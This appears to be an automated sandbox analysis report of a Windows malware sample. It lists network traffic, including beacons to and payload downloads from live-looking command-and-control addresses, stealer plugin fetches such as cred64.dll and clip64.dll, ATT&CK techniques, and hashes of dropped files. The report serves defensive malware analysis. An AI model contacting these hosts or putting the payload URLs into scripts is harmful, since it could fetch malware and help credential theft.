204.79.197.237:443https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0Etls, http22.5kB 9.0kB 20 17
HTTP Request
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0EHTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0EHTTP Response
204 -
23.62.61.194:443https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893tls, http21.5kB 5.4kB 17 12
HTTP Request
GET https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893HTTP Response
200 -
1.9kB 2.1kB 16 13
HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.139/sev56rkm/index.phpHTTP Response
200 -
274.8kB 8.1MB 5794 5793
HTTP Request
GET http://193.233.132.167/cost/sarra.exeHTTP Response
200HTTP Request
GET http://193.233.132.167/mine/amert.exeHTTP Response
200HTTP Request
GET http://193.233.132.167/mine/random.exeHTTP Response
200HTTP Request
GET http://193.233.132.167/cost/random.exeHTTP Response
200 -
1.0kB 8.4kB 10 10
-
2.2kB 10.7kB 17 20
HTTP Request
GET https://www.youtube.com/account -
172.217.16.234:443https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=prototls, http2chrome.exe1.9kB 7.0kB 16 17
HTTP Request
GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto -
172.217.16.238:443https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1tls, http2chrome.exe3.2kB 25.8kB 25 34
HTTP Request
GET https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650×tamp=1714237659684HTTP Request
GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1 -
953 B 4.8kB 8 9
-
142.250.187.206:443https://play.google.com/log?format=json&hasfast=true&authuser=0tls, http2chrome.exe1.7kB 8.5kB 14 15
HTTP Request
OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0 -
49.5kB 1.4MB 1042 1041
HTTP Request
POST http://193.233.132.167/enigma/index.phpHTTP Response
200HTTP Request
POST http://193.233.132.167/enigma/index.phpHTTP Response
200HTTP Request
GET http://193.233.132.167/enigma/Plugins/cred64.dllHTTP Response
200HTTP Request
GET http://193.233.132.167/enigma/Plugins/clip64.dllHTTP Response
200 -
403 B 351 B 5 3
HTTP Request
POST http://193.233.132.167/enigma/index.phpHTTP Response
200 -
386 B 891 B 5 4
HTTP Request
POST http://193.233.132.167/enigma/index.phpHTTP Response
200 -
3.4kB 8.0kB 27 28
HTTP Request
POST https://beacons.gcp.gvt2.com/domainreliability/uploadHTTP Request
OPTIONS https://beacons.gcp.gvt2.com/domainreliability/upload-nelHTTP Request
POST https://beacons.gcp.gvt2.com/domainreliability/upload-nelHTTP Response
200HTTP Response
200 -
953 B 5.8kB 8 8
-
999 B 8.4kB 9 10
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.23713.107.21.237
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
73 B 143 B 1 1
DNS Request
237.197.79.204.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
73.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
194.61.62.23.in-addr.arpa
-
74 B 129 B 1 1
DNS Request
139.132.233.193.in-addr.arpa
-
74 B 129 B 1 1
DNS Request
167.132.233.193.in-addr.arpa
-
61 B 271 B 1 1
DNS Request
www.youtube.com
DNS Response
142.250.179.238142.250.180.14142.250.187.206142.250.187.238142.250.178.14172.217.16.238142.250.200.14142.250.200.46216.58.201.110216.58.204.78216.58.212.206
-
65 B 81 B 1 1
DNS Request
accounts.google.com
DNS Response
173.194.69.84
-
74 B 112 B 1 1
DNS Request
195.187.250.142.in-addr.arpa
-
74 B 113 B 1 1
DNS Request
234.187.250.142.in-addr.arpa
-
74 B 113 B 1 1
DNS Request
238.179.250.142.in-addr.arpa
-
10.3kB 127.7kB 80 131
-
77 B 269 B 1 1
DNS Request
content-autofill.googleapis.com
DNS Response
172.217.16.234142.250.200.10142.250.200.42216.58.201.106216.58.204.74216.58.212.202172.217.169.74142.250.179.234142.250.180.10142.250.187.202142.250.187.234142.250.178.10
-
66 B 110 B 1 1
DNS Request
accounts.youtube.com
DNS Response
172.217.16.238
-
72 B 105 B 1 1
DNS Request
84.69.194.173.in-addr.arpa
-
72 B 110 B 1 1
DNS Request
3.180.250.142.in-addr.arpa
-
73 B 171 B 1 1
DNS Request
227.212.58.216.in-addr.arpa
-
73 B 142 B 1 1
DNS Request
234.16.217.172.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.178.4
-
3.8kB 9.4kB 10 11
-
73 B 142 B 1 1
DNS Request
238.16.217.172.in-addr.arpa
-
72 B 110 B 1 1
DNS Request
4.178.250.142.in-addr.arpa
-
65 B 105 B 1 1
DNS Request
clients2.google.com
DNS Response
172.217.16.238
-
3.0kB 7.2kB 8 8
-
204 B 3
-
61 B 77 B 1 1
DNS Request
play.google.com
DNS Response
142.250.187.206
-
7.7kB 9.9kB 18 22
-
74 B 113 B 1 1
DNS Request
206.187.250.142.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
86.23.85.13.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
56.126.166.20.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
17.14.97.104.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
249.197.17.2.in-addr.arpa
-
3.0kB 3.8kB 8 10
-
66 B 112 B 1 1
DNS Request
beacons.gcp.gvt2.com
DNS Response
192.178.49.163
-
3.9kB 8.2kB 10 12
-
3.3kB 9.1kB 9 11
-
73 B 111 B 1 1
DNS Request
163.49.178.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
48.229.111.52.in-addr.arpa
-
3.3kB 7.7kB 9 10
-
2.3kB 3.6kB 8 9
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Unsecured Credentials
3Credentials In Files
2Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD50497563e275b32e342da1989bb2cf6f2
SHA1c594939a57800487a989bc09bc9e3f899db59aea
SHA256e6524423b5e5e0da456fe7d8272a30bd8e878e70854f23674998534202c77c6b
SHA5127a2f7713ab7cfa24717f17a9e4e781ccd80b52841c6d1f5e4fa0690bd37077eb32d8bfb9ad67a319de3fc0ea11f2694423edb395fd9aa5183f4606f07d125295
-
Filesize
336B
MD5a0af34e1f3aef14293b37c023846051e
SHA17dae01f48dda550c2639ae8ee047f97be06c753a
SHA256ac42fce4ecbce007d54cfd4ea4e18d2b90ec1cd45728b93b6b55bf455ec4685c
SHA512876f3dbf4e95482c23118b139d5d1b5b84cb3f85f2246a4ed8d4b6929f5ea0f23921f3163eb9526f2f1f4eb668e0cf4f45f71ca312ae9816614a2606b67bc21a
-
Filesize
2KB
MD5250c3d32caabdefb4ed3592e94ca7305
SHA1ac91942901e13e01e5c67d475e4cb33df1a2ed87
SHA256861caefe1da6ad956b582ee7c0dfc80ad6fb79e2c6487d19cd4c8c0f5808b2ad
SHA512dfa5aaac198167fbd6c9bd15efbfbb50502bc63581692e4d03bdb29ada48fc12f70ccd21fac6d7d425428a171134104b185791d4376915824f27d2f5d88ac2d2
-
Filesize
2KB
MD5b0846907d836874276fd1e06bc63ff6e
SHA121c7454f2d241e9bf71530e6bae6ec07d0444838
SHA25621d91ef290b92e8413d621c2f3460690fe09094aed1fe525349da8efab81ecfe
SHA512153c03576f41c184399e83357ebc974fa1f082fc4543ced0f654f6c8f36414948e283ce2a8673d0ae51d14a67d9e7c10cc69a1b07e61802708e57b04fe3ddd18
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
524B
MD526b12922fa214dcfc52200f46a0b422e
SHA1238c0e30bdef8f685e7c81f47ac92631ac86a004
SHA2563eaf9b3cd8ac1e9d83598af9065c476b0aad990330cd19299d4795e9bdb35ba8
SHA512666ea9b0d91df8a1d80eb692e90aacd3cc0fe8e83965d420e53a4aa2d6d76bebd71ddfd8bd274e9836a9562613a9854d8cdf07b8f2527dd1e70ab7abda022d5b
-
Filesize
524B
MD56bb6a44739a10e9c36fc4d7fad840df1
SHA169b97c2272b129ce55936657870c2202cb0c10d2
SHA256deb4350b5c985cb6ea6b6f47a5d0986957e46fd778ca110ebee6f633f857b5db
SHA51283e5df19852e65366f3445ae9f3bf047a581247d0a5a0bcce394fcaa0508b0b1fc11f77a740d022c51f362af4f421d8630373098b78f58ad3abd390ae85855e5
-
Filesize
7KB
MD52ace7fa8c3801d3316408c915478e826
SHA13a272b13151206dfe237d9a6f0a092b82a037eea
SHA256cc6e249e219d0fe38bb698dd8551db2f4e58a9e7a397f4e9881c2e8bb8829c48
SHA512e6c7f013b2c8fe61dec25850482eb01306e4385daaa10ad875287e244e2a675646479d4c3e693978dbdbf8dcb4a1863be433967187d8c01fca4cb279cf15c6cb
-
Filesize
16KB
MD539cf350c7920d55f5193ea22895bef79
SHA1c6af73e251271330020eec298968e97c48ae75b7
SHA2568161026454fdb4453e41aa50cd792c07c6c4c7947bae52f34908a94d32dff73c
SHA512da0bd7434df05d9ef969d72a238eec1575e5146971feb97308659ded6557b3ae6bfab964ff8015cfb574c57f52ae934b679072e37453ff58702d9d05096da5a4
-
Filesize
258KB
MD5da3e7a3197597c7ee9b1e7786383c2be
SHA13fd387638f59ab2aba88cc3579fa501925f681d7
SHA256a9e580ef45add2b18588159dd7908fd98710f4bc2455782011b4239d22280c9e
SHA512b660d2b65bcaf946ad4e631c908ebc3cb3a418100c31f3f917bafacc232f1a05482b25666045b42b87e432d22def333df18829418d3bc0ed0efd235f468f531f
-
Filesize
258KB
MD5ea64c51b3f5e4a25b4c67f4a78103e20
SHA124c459e78c751be7e21fc3dad73345b551bb6897
SHA25665e7ced6b2b448f75f0efbc8129b46d1df9e4d0494498cc86ff6c070fbae13a1
SHA51201cc7a024e81ddef984c99a7a3cc9e87be7d80ee58cb0433eb05d584e744cb9d70ad78e83c7ea477492438605544ab74c1b4cc138f54cbd35aa5b0540af41ed1
-
Filesize
131KB
MD533955c0c4cb72786e37ceb31947fa8a5
SHA184c7b106fe1667dfb044b148902673da6a93e619
SHA256c77f1e58f9b1e31745f567d8a8f7dd01d7e75b3199952d4d447ad01f6aafee66
SHA512b12601cc80c68b9b5b9ce11b7e422686e4816cb724bcca9a6b640a0d156e96ab19006dd325b14a9bde919c94ffa94743a4b7b0605c097a3b0386949702a1a019
-
Filesize
279KB
MD5a7e0bf1f789de3fc13b861b1949b0943
SHA16d3e90d7eaf14adfce866f6bfaaa42be2ca5d8c2
SHA2562647da1a7e8ad11f2ec19e3799f7e9ff71a8649381668c870f0da88d5fe4c875
SHA512e22f97b6bd09ff65d7d84349e28fb2416e94e39c38f98af3877fcd0263bbcdeac0e1328ad6691b722becdf02ed482bb842ad5c75d1ca8e69cff36883242dfff4
-
Filesize
98KB
MD53c2a602fe42ebe2b9f26c6e6ff6d6031
SHA1530bf9768e3f4985dc71a3631fc085ee6fbd9422
SHA256bd1ba2722cd885e1a7fdcca19cd0f19353fa04bc88873f43e4a5ab8c41a1ea92
SHA512a7063b16283bbd4b5b7efba3cc49d4d0d3baadc9dc5c50ff8f6aff09f8bab54c05ef4ba98ac93de4a0bd36b8ceb5a4932f45a3a1d00113c710311222f7b0d062
-
Filesize
94KB
MD506f8e2b020ae7c826ce6beffa82f8880
SHA1828309b0861490a62f74f51adba14703911dc892
SHA25613a69800f955140cd7850825cf63b0fda66efa066ae10342876db6c4df4c1f77
SHA5127c2edb10419d79e222567232fd5d186d50fe0cce952bec78fd11e373e2236667bf6adc64397a99614e7bfe5ba3a4a3f4f561ca2518ab84a0ca813345d53fd6d7
-
Filesize
1.8MB
MD573d73c48859fc7aa4fd78d9a57f859d6
SHA1c1f71ea0692d97c653ff5a5ecbc03fd02173fe05
SHA256d46a8fa545385ab42ca58f6175b13f4b9989d88322ab624f646623b4a52a4876
SHA512f0634be539582016c03e83f3ca58d613fc16abcc0a9c320321f455234a8f2dc1c199fc52187abac5e4cbbe7b7907afdaa89813f50cbecd611f7e870ee7f8e979
-
Filesize
1.1MB
MD5fd12e45487d406d9bf958e2c07c45083
SHA1ec6e3d877be9af04e131fa9583014479f1d1a51d
SHA2565aafc97f69d699210d0978a093626279ba36c9b9b533ddfc38f90f464bc11527
SHA51240b1c3d71ebd7cafb3858d063e6f0fcf3821f60226c5a84d523555178f3b435f53b0a6cacefb1d38a39ab752e7bd76653c208c9e3874c646aca3067bf402acd1
-
Filesize
1.8MB
MD53129fec389a088955fae72aa12b20ef0
SHA1e4cc27027754574a6abdf0010333930016b37fb5
SHA256acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75
SHA512918ac19261d99d7ea7cc92bdf6e72a8caff90eb6241c650fe95cf0230bce9af8bc52231c0a7452244b88b6024b0061351520e57400952e4bf4191e67bc8139e9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
109KB
MD5154c3f1334dd435f562672f2664fea6b
SHA151dd25e2ba98b8546de163b8f26e2972a90c2c79
SHA2565f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f
SHA5121bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841
-
Filesize
1.2MB
MD5f35b671fda2603ec30ace10946f11a90
SHA1059ad6b06559d4db581b1879e709f32f80850872
SHA25683e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7
SHA512b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705